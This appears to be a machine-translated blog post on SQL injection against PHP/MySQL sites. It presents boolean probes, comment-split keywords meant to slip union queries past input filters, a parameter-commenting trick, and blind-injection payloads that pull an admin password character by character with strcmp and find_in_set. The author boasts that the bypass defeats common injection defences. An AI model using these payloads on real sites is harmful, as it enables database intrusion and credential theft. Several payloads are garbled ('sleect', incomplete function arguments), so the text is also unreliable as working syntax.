New Injection & amp; bypass methods under sqlinjection

Since the development of SQL injection, many security articles seem to distort the injection thinking of many people. The traditional method of detecting injection is as follows:

 
And 1 = 1, and 1 = 2 to determine whether it is true or false to determine whether the filter is complete, of course, there are also or 1 = 2, or 1 = 1, or in a numerical injection for example: id = 1 + 1 or id = 2-1, etc.
 
The purpose of this article is not to judge who's testing method is practical, but to recommend some new injection methods, which may have been mentioned earlier :)
 
Note: It is mainly used for mysql injection in php. We will not introduce it one by one.
 
First, let's judge:
 
The Null value can be used as follows: and 1 is null, and 1 is not null.
 
Or: and 2 <= 3
 
In fact, many people often use = to judge, but, for example, >=, <=, is null, is not null, and <> can be used to determine
 
Next we will talk about injection.
 
We are familiar with the union select and blind sqlinjection values)
 
Union Select
 
For conventional injection, We Can union select 1, 2, 3, 4, or union/**/select/*/1, 2, 3, 4
 
OK. Let's see my demo, id = 1 + u/**/nio/**/n + se/**/lect + 1 & id = 2, 3 & id = 4 is disgusting? Attackers can bypass all injection prevention measures in China. This code has the above effect after running. As for the principle, I hope you can check the relevant information by yourself. If you have any objection, leave a message for me.
 
Of course, when the statement passes multiple parameters, such as slect * from table where id = 1 and name = xxx, we can do this:
 
Id = 1 + union/* & name = */select + 1, 2
 
After the query, slect * from table where id = 1 union/* and name = xxx */select 1, 2 is a technique to invalidate constants (variables). Of course, strict environment requirements :)
 
The following describes Blind SqlIjection (Blind note ):
 
In general, I think we should do this: ascii (substring (password,) = 56, or ord (mid (password,) = 56
 
Here, we recommend that you use subqueries. Of course, the premise is to guess the table and fields to get the desired data more accurately.
 
Previously, we recommended some new methods:
 
Find_in_set example: find_in_set (56, ascii (substr (password, 1, 1) = 1
 
Strcmp example: strcmp (left (password, 1), 0x56) = 1
 
 
 
Set these functions as subqueries:
 
Id = 1 + and + strcmp (substring (sleect + password + from + admin + limit +),), 0x55) = 1 false
 
Id = 1 + and + strcmp (substring (sleect + password + from + admin + limit +),), 0x56) = 0 true
 
Id = 1 + and + strcmp (substring (sleect + password + from + admin + limit +),), 0x57) =-1 false
 
If you do not understand the principle, please refer to the function manual or leave a message for me